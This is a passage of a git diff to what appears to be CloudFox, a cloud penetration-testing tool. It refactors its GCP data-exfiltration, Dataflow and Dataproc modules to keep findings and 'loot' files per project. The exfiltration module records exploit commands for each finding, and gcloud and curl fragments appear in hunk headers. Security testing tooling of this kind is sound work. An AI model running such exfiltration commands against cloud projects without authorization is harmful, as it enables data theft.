GCP_DATAEXFILTRATION_MODULE_NAME) @@ -186,19 +209,22 @@ func (m *DataExfiltrationModule) Execute(ctx context.Context, logger internal.Lo // Generate hardening recommendations hardeningRecs := m.generateMissingHardeningRecommendations() + allPaths := m.getAllExfiltrationPaths() + allVectors := m.getAllPotentialVectors() + // Check results - hasResults := len(m.ExfiltrationPaths) > 0 || len(m.PotentialVectors) > 0 || len(hardeningRecs) > 0 + hasResults := len(allPaths) > 0 || len(allVectors) > 0 || len(hardeningRecs) > 0 if !hasResults { logger.InfoM("No data exfiltration paths, vectors, or hardening gaps found", GCP_DATAEXFILTRATION_MODULE_NAME) return } - if len(m.ExfiltrationPaths) > 0 { - logger.SuccessM(fmt.Sprintf("Found %d actual misconfiguration(s)", len(m.ExfiltrationPaths)), GCP_DATAEXFILTRATION_MODULE_NAME) + if len(allPaths) > 0 { + logger.SuccessM(fmt.Sprintf("Found %d actual misconfiguration(s)", len(allPaths)), GCP_DATAEXFILTRATION_MODULE_NAME) } - if len(m.PotentialVectors) > 0 { - logger.SuccessM(fmt.Sprintf("Found %d potential exfiltration vector(s)", len(m.PotentialVectors)), GCP_DATAEXFILTRATION_MODULE_NAME) + if len(allVectors) > 0 { + logger.SuccessM(fmt.Sprintf("Found %d potential exfiltration vector(s)", len(allVectors)), GCP_DATAEXFILTRATION_MODULE_NAME) } if len(hardeningRecs) > 0 { logger.InfoM(fmt.Sprintf("Found %d hardening recommendation(s)", len(hardeningRecs)), GCP_DATAEXFILTRATION_MODULE_NAME) @@ -543,11 +569,25 @@ gcloud access-context-manager perimeters create NAME \ // ------------------------------ // Project Processor // ------------------------------ +func (m *DataExfiltrationModule) initializeLootForProject(projectID string) { + if m.LootMap[projectID] == nil { + m.LootMap[projectID] = make(map[string]*internal.LootFile) + m.LootMap[projectID]["data-exfiltration-commands"] = &internal.LootFile{ + Name: "data-exfiltration-commands", + Contents: "# Data Exfiltration Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization!\n\n", + } + } +} + func (m *DataExfiltrationModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { logger.InfoM(fmt.Sprintf("Analyzing exfiltration paths in project: %s", projectID), GCP_DATAEXFILTRATION_MODULE_NAME) } + m.mu.Lock() + m.initializeLootForProject(projectID) + m.mu.Unlock() + // === ACTUAL MISCONFIGURATIONS === // 1. Find public/shared snapshots (REAL check) @@ -654,9 +694,9 @@ func (m *DataExfiltrationModule) findPublicSnapshots(ctx context.Context, projec } m.mu.Lock() - m.PublicExports = append(m.PublicExports, export) - m.ExfiltrationPaths = append(m.ExfiltrationPaths, path) - m.addExfiltrationPathToLoot(path) + m.ProjectPublicExports[projectID] = append(m.ProjectPublicExports[projectID], export) + m.ProjectExfiltrationPaths[projectID] = append(m.ProjectExfiltrationPaths[projectID], path) + m.addExfiltrationPathToLoot(projectID, path) m.mu.Unlock() } } @@ -725,9 +765,9 @@ func (m *DataExfiltrationModule) findPublicImages(ctx context.Context, projectID } m.mu.Lock() - m.PublicExports = append(m.PublicExports, export) - m.ExfiltrationPaths = append(m.ExfiltrationPaths, path) - m.addExfiltrationPathToLoot(path) + m.ProjectPublicExports[projectID] = append(m.ProjectPublicExports[projectID], export) + m.ProjectExfiltrationPaths[projectID] = append(m.ProjectExfiltrationPaths[projectID], path) + m.addExfiltrationPathToLoot(projectID, path) m.mu.Unlock() } } @@ -805,9 +845,9 @@ func (m *DataExfiltrationModule) findPublicBuckets(ctx context.Context, projectI } m.mu.Lock() - m.PublicExports = append(m.PublicExports, export) - m.ExfiltrationPaths = append(m.ExfiltrationPaths, path) - m.addExfiltrationPathToLoot(path) + m.ProjectPublicExports[projectID] = append(m.ProjectPublicExports[projectID], export) + m.ProjectExfiltrationPaths[projectID] = append(m.ProjectExfiltrationPaths[projectID], path) + m.addExfiltrationPathToLoot(projectID, path) m.mu.Unlock() } } @@ -854,8 +894,8 @@ func (m *DataExfiltrationModule) findCrossProjectLoggingSinks(ctx context.Contex } m.mu.Lock() - m.ExfiltrationPaths = append(m.ExfiltrationPaths, path) - m.addExfiltrationPathToLoot(path) + m.ProjectExfiltrationPaths[projectID] = append(m.ProjectExfiltrationPaths[projectID], path) + m.addExfiltrationPathToLoot(projectID, path) m.mu.Unlock() } } @@ -906,8 +946,8 @@ func (m *DataExfiltrationModule) findPubSubPushEndpoints(ctx context.Context, pr } m.mu.Lock() - m.ExfiltrationPaths = append(m.ExfiltrationPaths, path) - m.addExfiltrationPathToLoot(path) + m.ProjectExfiltrationPaths[projectID] = append(m.ProjectExfiltrationPaths[projectID], path) + m.addExfiltrationPathToLoot(projectID, path) m.mu.Unlock() } } @@ -943,8 +983,8 @@ func (m *DataExfiltrationModule) findPubSubExportSubscriptions(ctx context.Conte } m.mu.Lock() - m.ExfiltrationPaths = append(m.ExfiltrationPaths, path) - m.addExfiltrationPathToLoot(path) + m.ProjectExfiltrationPaths[projectID] = append(m.ProjectExfiltrationPaths[projectID], path) + m.addExfiltrationPathToLoot(projectID, path) m.mu.Unlock() } } @@ -967,8 +1007,8 @@ func (m *DataExfiltrationModule) findPubSubExportSubscriptions(ctx context.Conte } m.mu.Lock() - m.ExfiltrationPaths = append(m.ExfiltrationPaths, path) - m.addExfiltrationPathToLoot(path) + m.ProjectExfiltrationPaths[projectID] = append(m.ProjectExfiltrationPaths[projectID], path) + m.addExfiltrationPathToLoot(projectID, path) m.mu.Unlock() } } @@ -1013,9 +1053,9 @@ func (m *DataExfiltrationModule) findPublicBigQueryDatasets(ctx context.Context, } m.mu.Lock() - m.PublicExports = append(m.PublicExports, export) - m.ExfiltrationPaths = append(m.ExfiltrationPaths, path) - m.addExfiltrationPathToLoot(path) + m.ProjectPublicExports[projectID] = append(m.ProjectPublicExports[projectID], export) + m.ProjectExfiltrationPaths[projectID] = append(m.ProjectExfiltrationPaths[projectID], path) + m.addExfiltrationPathToLoot(projectID, path) m.mu.Unlock() } } @@ -1058,8 +1098,8 @@ func (m *DataExfiltrationModule) findCloudSQLExportConfig(ctx context.Context, p } m.mu.Lock() - m.ExfiltrationPaths = append(m.ExfiltrationPaths, path) - m.addExfiltrationPathToLoot(path) + m.ProjectExfiltrationPaths[projectID] = append(m.ProjectExfiltrationPaths[projectID], path) + m.addExfiltrationPathToLoot(projectID, path) m.mu.Unlock() } } @@ -1123,8 +1163,8 @@ func (m *DataExfiltrationModule) findStorageTransferJobs(ctx context.Context, pr } m.mu.Lock() - m.ExfiltrationPaths = append(m.ExfiltrationPaths, path) - m.addExfiltrationPathToLoot(path) + m.ProjectExfiltrationPaths[projectID] = append(m.ProjectExfiltrationPaths[projectID], path) + m.addExfiltrationPathToLoot(projectID, path) m.mu.Unlock() } } @@ -1173,8 +1213,8 @@ bq mk --external_table_definition=gs://bucket/file.csv@CSV DATASET.external_tabl } m.mu.Lock() - m.PotentialVectors = append(m.PotentialVectors, vector) - m.addPotentialVectorToLoot(vector) + m.ProjectPotentialVectors[projectID] = append(m.ProjectPotentialVectors[projectID], vector) + m.addPotentialVectorToLoot(projectID, vector) m.mu.Unlock() } } @@ -1213,8 +1253,8 @@ gcloud pubsub subscriptions modify-push-config SUB_NAME \ } m.mu.Lock() - m.PotentialVectors = append(m.PotentialVectors, vector) - m.addPotentialVectorToLoot(vector) + m.ProjectPotentialVectors[projectID] = append(m.ProjectPotentialVectors[projectID], vector) + m.addPotentialVectorToLoot(projectID, vector) m.mu.Unlock() } } @@ -1264,8 +1304,8 @@ gcloud functions describe FUNCTION_NAME --project=%s`, projectID, projectID, pro } m.mu.Lock() - m.PotentialVectors = append(m.PotentialVectors, vector) - m.addPotentialVectorToLoot(vector) + m.ProjectPotentialVectors[projectID] = append(m.ProjectPotentialVectors[projectID], vector) + m.addPotentialVectorToLoot(projectID, vector) m.mu.Unlock() } } @@ -1317,8 +1357,8 @@ curl -H "Authorization: Bearer $(gcloud auth print-identity-token)" SERVICE_URL` } m.mu.Lock() - m.PotentialVectors = append(m.PotentialVectors, vector) - m.addPotentialVectorToLoot(vector) + m.ProjectPotentialVectors[projectID] = append(m.ProjectPotentialVectors[projectID], vector) + m.addPotentialVectorToLoot(projectID, vector) m.mu.Unlock() } } @@ -1381,8 +1421,8 @@ gcloud logging sinks update SINK_NAME \ // Only add if there's evidence logging is actively used or we found sinks if len(sinks) > 0 || hasCrossProjectSink { m.mu.Lock() - m.PotentialVectors = append(m.PotentialVectors, vector) - m.addPotentialVectorToLoot(vector) + m.ProjectPotentialVectors[projectID] = append(m.ProjectPotentialVectors[projectID], vector) + m.addPotentialVectorToLoot(projectID, vector) m.mu.Unlock() } } @@ -1390,19 +1430,17 @@ gcloud logging sinks update SINK_NAME \ // ------------------------------ // Loot File Management // ------------------------------ -func (m *DataExfiltrationModule) initializeLootFiles() { - m.LootMap["data-exfiltration-commands"] = &internal.LootFile{ - Name: "data-exfiltration-commands", - Contents: "# Data Exfiltration Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization!\n\n", +func (m *DataExfiltrationModule) addExfiltrationPathToLoot(projectID string, path ExfiltrationPath) { + if path.ExploitCommand == "" { + return } -} -func (m *DataExfiltrationModule) addExfiltrationPathToLoot(path ExfiltrationPath) { - if path.ExploitCommand == "" { + lootFile := m.LootMap[projectID]["data-exfiltration-commands"] + if lootFile == nil { return } - m.LootMap["data-exfiltration-commands"].Contents += fmt.Sprintf( + lootFile.Contents += fmt.Sprintf( "#############################################\n"+ "## [ACTUAL] %s: %s\n"+ "## Project: %s\n"+ @@ -1416,15 +1454,20 @@ func (m *DataExfiltrationModule) addExfiltrationPathToLoot(path ExfiltrationPath path.Destination, ) - m.LootMap["data-exfiltration-commands"].Contents += fmt.Sprintf("%s\n\n", path.ExploitCommand) + lootFile.Contents += fmt.Sprintf("%s\n\n", path.ExploitCommand) } -func (m *DataExfiltrationModule) addPotentialVectorToLoot(vector PotentialVector) { +func (m *DataExfiltrationModule) addPotentialVectorToLoot(projectID string, vector PotentialVector) { if vector.ExploitCommand == "" { return } - m.LootMap["data-exfiltration-commands"].Contents += fmt.Sprintf( + lootFile := m.LootMap[projectID]["data-exfiltration-commands"] + if lootFile == nil { + return + } + + lootFile.Contents += fmt.Sprintf( "#############################################\n"+ "## [POTENTIAL] %s\n"+ "## Project: %s\n"+ @@ -1437,50 +1480,44 @@ func (m *DataExfiltrationModule) addPotentialVectorToLoot(vector PotentialVector vector.Destination, ) - m.LootMap["data-exfiltration-commands"].Contents += fmt.Sprintf("%s\n\n", vector.ExploitCommand) + lootFile.Contents += fmt.Sprintf("%s\n\n", vector.ExploitCommand) } -func (m *DataExfiltrationModule) addHardeningRecommendationsToLoot(recommendations []MissingHardening) { +func (m *DataExfiltrationModule) addHardeningRecommendationsToLoot(projectID string, recommendations []MissingHardening) { if len(recommendations) == 0 { return } // Initialize hardening loot file if not exists - if _, ok := m.LootMap["data-exfiltration-hardening"]; !ok { - m.LootMap["data-exfiltration-hardening"] = &internal.LootFile{ + if m.LootMap[projectID]["data-exfiltration-hardening"] == nil { + m.LootMap[projectID]["data-exfiltration-hardening"] = &internal.LootFile{ Name: "data-exfiltration-hardening", Contents: "# Data Exfiltration Prevention - Hardening Recommendations\n# Generated by CloudFox\n# These controls help prevent data exfiltration from GCP projects\n\n", } } - // Group recommendations by project - projectRecs := make(map[string][]MissingHardening) + lootFile := m.LootMap[projectID]["data-exfiltration-hardening"] + + lootFile.Contents += fmt.Sprintf( + "#############################################\n"+ + "## PROJECT: %s (%s)\n"+ + "## Missing %d security control(s)\n"+ + "#############################################\n\n", + projectID, + m.GetProjectName(projectID), + len(recommendations), + ) + for _, rec := range recommendations { - projectRecs[rec.ProjectID] = append(projectRecs[rec.ProjectID], rec) - } - - for projectID, recs := range projectRecs { - m.LootMap["data-exfiltration-hardening"].Contents += fmt.Sprintf( - "#############################################\n"+ - "## PROJECT: %s (%s)\n"+ - "## Missing %d security control(s)\n"+ - "#############################################\n\n", - projectID, - m.GetProjectName(projectID), - len(recs), + lootFile.Contents += fmt.Sprintf( + "## [%s] %s\n"+ + "## Description: %s\n"+ + "#############################################\n", + rec.Category, + rec.Control, + rec.Description, ) - - for _, rec := range recs { - m.LootMap["data-exfiltration-hardening"].Contents += fmt.Sprintf( - "## [%s] %s\n"+ - "## Description: %s\n"+ - "#############################################\n", - rec.Category, - rec.Control, - rec.Description, - ) - m.LootMap["data-exfiltration-hardening"].Contents += fmt.Sprintf("%s\n\n", rec.Recommendation) - } + lootFile.Contents += fmt.Sprintf("%s\n\n", rec.Recommendation) } } @@ -1489,8 +1526,27 @@ func (m *DataExfiltrationModule) addHardeningRecommendationsToLoot(recommendatio // ------------------------------ func (m *DataExfiltrationModule) writeOutput(ctx context.Context, logger internal.Logger) { - // Table 1: Actual Misconfigurations - misconfigHeader := []string{ + if m.Hierarchy != nil && !m.FlatOutput { + m.writeHierarchicalOutput(ctx, logger) + } else { + m.writeFlatOutput(ctx, logger) + } +} + +func (m *DataExfiltrationModule) getMisconfigHeader() []string { + return []string{ + "Project ID", + "Project Name", + "Resource", + "Type", + "Destination", + "Public", + "Size", + } +} + +func (m *DataExfiltrationModule) getVectorHeader() []string { + return []string{ "Project ID", "Project Name", "Resource", @@ -1499,18 +1555,30 @@ func (m *DataExfiltrationModule) writeOutput(ctx context.Context, logger interna "Public", "Size", } +} + +func (m *DataExfiltrationModule) getHardeningHeader() []string { + return []string{ + "Project ID", + "Project Name", + "Category", + "Control", + "Description", + } +} - var misconfigBody [][]string +func (m *DataExfiltrationModule) pathsToTableBody(paths []ExfiltrationPath, exports []PublicExport) [][]string { + var body [][]string // Track which resources we've added from PublicExports publicResources := make(map[string]PublicExport) - for _, e := range m.PublicExports { + for _, e := range exports { key := fmt.Sprintf("%s:%s:%s", e.ProjectID, e.ResourceType, e.ResourceName) publicResources[key] = e } // Add exfiltration paths (actual misconfigurations) - for _, p := range m.ExfiltrationPaths { + for _, p := range paths { key := fmt.Sprintf("%s:%s:%s", p.ProjectID, p.PathType, p.ResourceName) export, isPublic := publicResources[key] @@ -1522,7 +1590,7 @@ func (m *DataExfiltrationModule) writeOutput(ctx context.Context, logger interna delete(publicResources, key) } - misconfigBody = append(misconfigBody, []string{ + body = append(body, []string{ p.ProjectID, m.GetProjectName(p.ProjectID), p.ResourceName, @@ -1535,7 +1603,7 @@ func (m *DataExfiltrationModule) writeOutput(ctx context.Context, logger interna // Add any remaining public exports not already covered for _, e := range publicResources { - misconfigBody = append(misconfigBody, []string{ + body = append(body, []string{ e.ProjectID, m.GetProjectName(e.ProjectID), e.ResourceName, @@ -1546,20 +1614,13 @@ func (m *DataExfiltrationModule) writeOutput(ctx context.Context, logger interna }) } - // Table 2: Potential Exfiltration Vectors - vectorHeader := []string{ - "Project ID", - "Project Name", - "Resource", - "Type", - "Destination", - "Public", - "Size", - } + return body +} - var vectorBody [][]string - for _, v := range m.PotentialVectors { - vectorBody = append(vectorBody, []string{ +func (m *DataExfiltrationModule) vectorsToTableBody(vectors []PotentialVector) [][]string { + var body [][]string + for _, v := range vectors { + body = append(body, []string{ v.ProjectID, m.GetProjectName(v.ProjectID), v.ResourceName, @@ -1569,20 +1630,13 @@ func (m *DataExfiltrationModule) writeOutput(ctx context.Context, logger interna "-", }) } + return body +} - // Table 3: Missing Hardening Recommendations - hardeningHeader := []string{ - "Project ID", - "Project Name", - "Category", - "Control", - "Description", - } - - var hardeningBody [][]string - hardeningRecs := m.generateMissingHardeningRecommendations() - for _, h := range hardeningRecs { - hardeningBody = append(hardeningBody, []string{ +func (m *DataExfiltrationModule) hardeningToTableBody(recs []MissingHardening) [][]string { + var body [][]string + for _, h := range recs { + body = append(body, []string{ h.ProjectID, m.GetProjectName(h.ProjectID), h.Category, @@ -1590,45 +1644,168 @@ func (m *DataExfiltrationModule) writeOutput(ctx context.Context, logger interna h.Description, }) } + return body +} - // Add hardening recommendations to loot file - m.addHardeningRecommendationsToLoot(hardeningRecs) +func (m *DataExfiltrationModule) buildTablesForProject(projectID string, hardeningRecs []MissingHardening) []internal.TableFile { + var tableFiles []internal.TableFile - // Collect loot files - var lootFiles []internal.LootFile - for _, loot := range m.LootMap { - if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization!\n\n") { - lootFiles = append(lootFiles, *loot) + paths := m.ProjectExfiltrationPaths[projectID] + exports := m.ProjectPublicExports[projectID] + vectors := m.ProjectPotentialVectors[projectID] + + if len(paths) > 0 || len(exports) > 0 { + body := m.pathsToTableBody(paths, exports) + if len(body) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: "data-exfiltration-misconfigurations", + Header: m.getMisconfigHeader(), + Body: body, + }) + } + } + + if len(vectors) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: "data-exfiltration-vectors", + Header: m.getVectorHeader(), + Body: m.vectorsToTableBody(vectors), + }) + } + + // Filter hardening for this project + var projectHardening []MissingHardening + for _, h := range hardeningRecs { + if h.ProjectID == projectID { + projectHardening = append(projectHardening, h) + } + } + + if len(projectHardening) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: "data-exfiltration-hardening", + Header: m.getHardeningHeader(), + Body: m.hardeningToTableBody(projectHardening), + }) + } + + return tableFiles +} + +func (m *DataExfiltrationModule) writeHierarchicalOutput(ctx context.Context, logger internal.Logger) { + outputData := internal.HierarchicalOutputData{ + OrgLevelData: make(map[string]internal.CloudfoxOutput), + ProjectLevelData: make(map[string]internal.CloudfoxOutput), + } + + hardeningRecs := m.generateMissingHardeningRecommendations() + + // Collect all project IDs that have data + projectIDs := make(map[string]bool) + for projectID := range m.ProjectExfiltrationPaths { + projectIDs[projectID] = true + } + for projectID := range m.ProjectPotentialVectors { + projectIDs[projectID] = true + } + for projectID := range m.ProjectPublicExports { + projectIDs[projectID] = true + } + for _, h := range hardeningRecs { + projectIDs[h.ProjectID] = true + } + + for projectID := range projectIDs { + // Ensure loot is initialized + m.initializeLootForProject(projectID) + + // Filter hardening recommendations for this project and add to loot + var projectHardening []MissingHardening + for _, h := range hardeningRecs { + if h.ProjectID == projectID { + projectHardening = append(projectHardening, h) + } + } + m.addHardeningRecommendationsToLoot(projectID, projectHardening) + + tableFiles := m.buildTablesForProject(projectID, hardeningRecs) + + var lootFiles []internal.LootFile + if projectLoot, ok := m.LootMap[projectID]; ok { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization!\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + } + + outputData.ProjectLevelData[projectID] = DataExfiltrationOutput{Table: tableFiles, Loot: lootFiles} + } + + pathBuilder := m.BuildPathBuilder() + + err := internal.HandleHierarchicalOutputSmart("gcp", m.Format, m.Verbosity, m.WrapTable, pathBuilder, outputData) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing hierarchical output: %v", err), GCP_DATAEXFILTRATION_MODULE_NAME) + } +} + +func (m *DataExfiltrationModule) writeFlatOutput(ctx context.Context, logger internal.Logger) { + allPaths := m.getAllExfiltrationPaths() + allVectors := m.getAllPotentialVectors() + allExports := m.getAllPublicExports() + hardeningRecs := m.generateMissingHardeningRecommendations() + + // Add hardening recommendations to loot files + for _, projectID := range m.ProjectIDs { + m.initializeLootForProject(projectID) + var projectHardening []MissingHardening + for _, h := range hardeningRecs { + if h.ProjectID == projectID { + projectHardening = append(projectHardening, h) + } } + m.addHardeningRecommendationsToLoot(projectID, projectHardening) } // Build tables tables := []internal.TableFile{} + misconfigBody := m.pathsToTableBody(allPaths, allExports) if len(misconfigBody) > 0 { tables = append(tables, internal.TableFile{ Name: "data-exfiltration-misconfigurations", - Header: misconfigHeader, + Header: m.getMisconfigHeader(), Body: misconfigBody, }) } - if len(vectorBody) > 0 { + if len(allVectors) > 0 { tables = append(tables, internal.TableFile{ Name: "data-exfiltration-vectors", - Header: vectorHeader, - Body: vectorBody, + Header: m.getVectorHeader(), + Body: m.vectorsToTableBody(allVectors), }) } - if len(hardeningBody) > 0 { + if len(hardeningRecs) > 0 { tables = append(tables, internal.TableFile{ Name: "data-exfiltration-hardening", - Header: hardeningHeader, - Body: hardeningBody, + Header: m.getHardeningHeader(), + Body: m.hardeningToTableBody(hardeningRecs), }) } + // Collect loot files + var lootFiles []internal.LootFile + for _, projectLoot := range m.LootMap { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization!\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + } + output := DataExfiltrationOutput{ Table: tables, Loot: lootFiles, diff --git a/gcp/commands/dataflow.go b/gcp/commands/dataflow.go index d67efd20..74ff958e 100644 --- a/gcp/commands/dataflow.go +++ b/gcp/commands/dataflow.go @@ -30,9 +30,10 @@ Features: type DataflowModule struct { gcpinternal.BaseGCPModule - Jobs []dataflowservice.JobInfo - LootMap map[string]*internal.LootFile - mu sync.Mutex + ProjectJobs map[string][]dataflowservice.JobInfo // projectID -> jobs + LootMap map[string]map[string]*internal.LootFile // projectID -> loot files + PrivescCache *gcpinternal.PrivescCache // Cached privesc analysis results + mu sync.Mutex } type DataflowOutput struct { @@ -51,17 +52,20 @@ func runGCPDataflowCommand(cmd *cobra.Command, args []string) { module := &DataflowModule{ BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), - Jobs: []dataflowservice.JobInfo{}, - LootMap: make(map[string]*internal.LootFile), + ProjectJobs: make(map[string][]dataflowservice.JobInfo), + LootMap: make(map[string]map[string]*internal.LootFile), } - module.initializeLootFiles() module.Execute(cmdCtx.Ctx, cmdCtx.Logger) } func (m *DataflowModule) Execute(ctx context.Context, logger internal.Logger) { + // Get privesc cache from context (populated by --with-privesc flag or all-checks) + m.PrivescCache = gcpinternal.GetPrivescCacheFromContext(ctx) + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_DATAFLOW_MODULE_NAME, m.processProject) - if len(m.Jobs) == 0 { + allJobs := m.getAllJobs() + if len(allJobs) == 0 { logger.InfoM("No Dataflow jobs found", globals.GCP_DATAFLOW_MODULE_NAME) return } @@ -69,7 +73,7 @@ func (m *DataflowModule) Execute(ctx context.Context, logger internal.Logger) { // Count by state running := 0 publicIPs := 0 - for _, job := range m.Jobs { + for _, job := range allJobs { if job.State == "JOB_STATE_RUNNING" { running++ } @@ -79,10 +83,18 @@ func (m *DataflowModule) Execute(ctx context.Context, logger internal.Logger) { } logger.SuccessM(fmt.Sprintf("Found %d Dataflow job(s) (%d running, %d with public IPs)", - len(m.Jobs), running, publicIPs), globals.GCP_DATAFLOW_MODULE_NAME) + len(allJobs), running, publicIPs), globals.GCP_DATAFLOW_MODULE_NAME) m.writeOutput(ctx, logger) } +func (m *DataflowModule) getAllJobs() []dataflowservice.JobInfo { + var all []dataflowservice.JobInfo + for _, jobs := range m.ProjectJobs { + all = append(all, jobs...) + } + return all +} + func (m *DataflowModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { logger.InfoM(fmt.Sprintf("Enumerating Dataflow in project: %s", projectID), globals.GCP_DATAFLOW_MODULE_NAME) @@ -98,22 +110,29 @@ func (m *DataflowModule) processProject(ctx context.Context, projectID string, l } m.mu.Lock() - m.Jobs = append(m.Jobs, jobs...) + m.ProjectJobs[projectID] = jobs + + // Initialize loot for this project + if m.LootMap[projectID] == nil { + m.LootMap[projectID] = make(map[string]*internal.LootFile) + m.LootMap[projectID]["dataflow-commands"] = &internal.LootFile{ + Name: "dataflow-commands", + Contents: "# Dataflow Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } + } + for _, job := range jobs { - m.addToLoot(job) + m.addToLoot(projectID, job) } m.mu.Unlock() } -func (m *DataflowModule) initializeLootFiles() { - m.LootMap["dataflow-commands"] = &internal.LootFile{ - Name: "dataflow-commands", - Contents: "# Dataflow Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", +func (m *DataflowModule) addToLoot(projectID string, job dataflowservice.JobInfo) { + lootFile := m.LootMap[projectID]["dataflow-commands"] + if lootFile == nil { + return } -} - -func (m *DataflowModule) addToLoot(job dataflowservice.JobInfo) { - m.LootMap["dataflow-commands"].Contents += fmt.Sprintf( + lootFile.Contents += fmt.Sprintf( "## Job: %s (Project: %s, Location: %s)\n"+ "# ID: %s\n"+ "# Type: %s\n"+ @@ -141,7 +160,15 @@ func (m *DataflowModule) addToLoot(job dataflowservice.JobInfo) { } func (m *DataflowModule) writeOutput(ctx context.Context, logger internal.Logger) { - header := []string{ + if m.Hierarchy != nil && !m.FlatOutput { + m.writeHierarchicalOutput(ctx, logger) + } else { + m.writeFlatOutput(ctx, logger) + } +} + +func (m *DataflowModule) getTableHeader() []string { + return []string{ "Project ID", "Project Name", "Name", @@ -149,17 +176,30 @@ func (m *DataflowModule) writeOutput(ctx context.Context, logger internal.Logger "State", "Location", "Service Account", + "Priv Esc", "Public IPs", "Workers", } +} +func (m *DataflowModule) jobsToTableBody(jobs []dataflowservice.JobInfo) [][]string { var body [][]string - for _, job := range m.Jobs { + for _, job := range jobs { publicIPs := "No" if job.UsePublicIPs { publicIPs = "Yes" } + // Check privesc for the service account + privEsc := "-" + if m.PrivescCache != nil && m.PrivescCache.IsPopulated() { + if job.ServiceAccount != "" { + privEsc = m.PrivescCache.GetPrivescSummary(job.ServiceAccount) + } else { + privEsc = "No" + } + } + body = append(body, []string{ job.ProjectID, m.GetProjectName(job.ProjectID), @@ -168,20 +208,58 @@ func (m *DataflowModule) writeOutput(ctx context.Context, logger internal.Logger job.State, job.Location, job.ServiceAccount, + privEsc, publicIPs, fmt.Sprintf("%d", job.NumWorkers), }) } + return body +} - var lootFiles []internal.LootFile - for _, loot := range m.LootMap { - if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n") { - lootFiles = append(lootFiles, *loot) +func (m *DataflowModule) writeHierarchicalOutput(ctx context.Context, logger internal.Logger) { + outputData := internal.HierarchicalOutputData{ + OrgLevelData: make(map[string]internal.CloudfoxOutput), + ProjectLevelData: make(map[string]internal.CloudfoxOutput), + } + + for projectID, jobs := range m.ProjectJobs { + body := m.jobsToTableBody(jobs) + tableFiles := []internal.TableFile{{Name: "dataflow", Header: m.getTableHeader(), Body: body}} + + var lootFiles []internal.LootFile + if projectLoot, ok := m.LootMap[projectID]; ok { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } } + + outputData.ProjectLevelData[projectID] = DataflowOutput{Table: tableFiles, Loot: lootFiles} + } + + pathBuilder := m.BuildPathBuilder() + + err := internal.HandleHierarchicalOutputSmart("gcp", m.Format, m.Verbosity, m.WrapTable, pathBuilder, outputData) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing hierarchical output: %v", err), globals.GCP_DATAFLOW_MODULE_NAME) } +} - tables := []internal.TableFile{{Name: "dataflow", Header: header, Body: body}} +func (m *DataflowModule) writeFlatOutput(ctx context.Context, logger internal.Logger) { + allJobs := m.getAllJobs() + body := m.jobsToTableBody(allJobs) + + var lootFiles []internal.LootFile + for _, projectLoot := range m.LootMap { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + } + tables := []internal.TableFile{{Name: "dataflow", Header: m.getTableHeader(), Body: body}} output := DataflowOutput{Table: tables, Loot: lootFiles} scopeNames := make([]string, len(m.ProjectIDs)) diff --git a/gcp/commands/dataproc.go b/gcp/commands/dataproc.go index ae6fdfdf..51de1966 100644 --- a/gcp/commands/dataproc.go +++ b/gcp/commands/dataproc.go @@ -30,9 +30,10 @@ Features: type DataprocModule struct { gcpinternal.BaseGCPModule - Clusters []dataprocservice.ClusterInfo - LootMap map[string]*internal.LootFile - mu sync.Mutex + ProjectClusters map[string][]dataprocservice.ClusterInfo // projectID -> clusters + LootMap map[string]map[string]*internal.LootFile // projectID -> loot files + PrivescCache *gcpinternal.PrivescCache // Cached privesc analysis results + mu sync.Mutex } type DataprocOutput struct { @@ -50,25 +51,28 @@ func runGCPDataprocCommand(cmd *cobra.Command, args []string) { } module := &DataprocModule{ - BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), - Clusters: []dataprocservice.ClusterInfo{}, - LootMap: make(map[string]*internal.LootFile), + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + ProjectClusters: make(map[string][]dataprocservice.ClusterInfo), + LootMap: make(map[string]map[string]*internal.LootFile), } - module.initializeLootFiles() module.Execute(cmdCtx.Ctx, cmdCtx.Logger) } func (m *DataprocModule) Execute(ctx context.Context, logger internal.Logger) { + // Get privesc cache from context (populated by --with-privesc flag or all-checks) + m.PrivescCache = gcpinternal.GetPrivescCacheFromContext(ctx) + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_DATAPROC_MODULE_NAME, m.processProject) - if len(m.Clusters) == 0 { + allClusters := m.getAllClusters() + if len(allClusters) == 0 { logger.InfoM("No Dataproc clusters found", globals.GCP_DATAPROC_MODULE_NAME) return } runningCount := 0 publicCount := 0 - for _, cluster := range m.Clusters { + for _, cluster := range allClusters { if cluster.State == "RUNNING" { runningCount++ } @@ -78,10 +82,18 @@ func (m *DataprocModule) Execute(ctx context.Context, logger internal.Logger) { } logger.SuccessM(fmt.Sprintf("Found %d Dataproc cluster(s) (%d running, %d with public 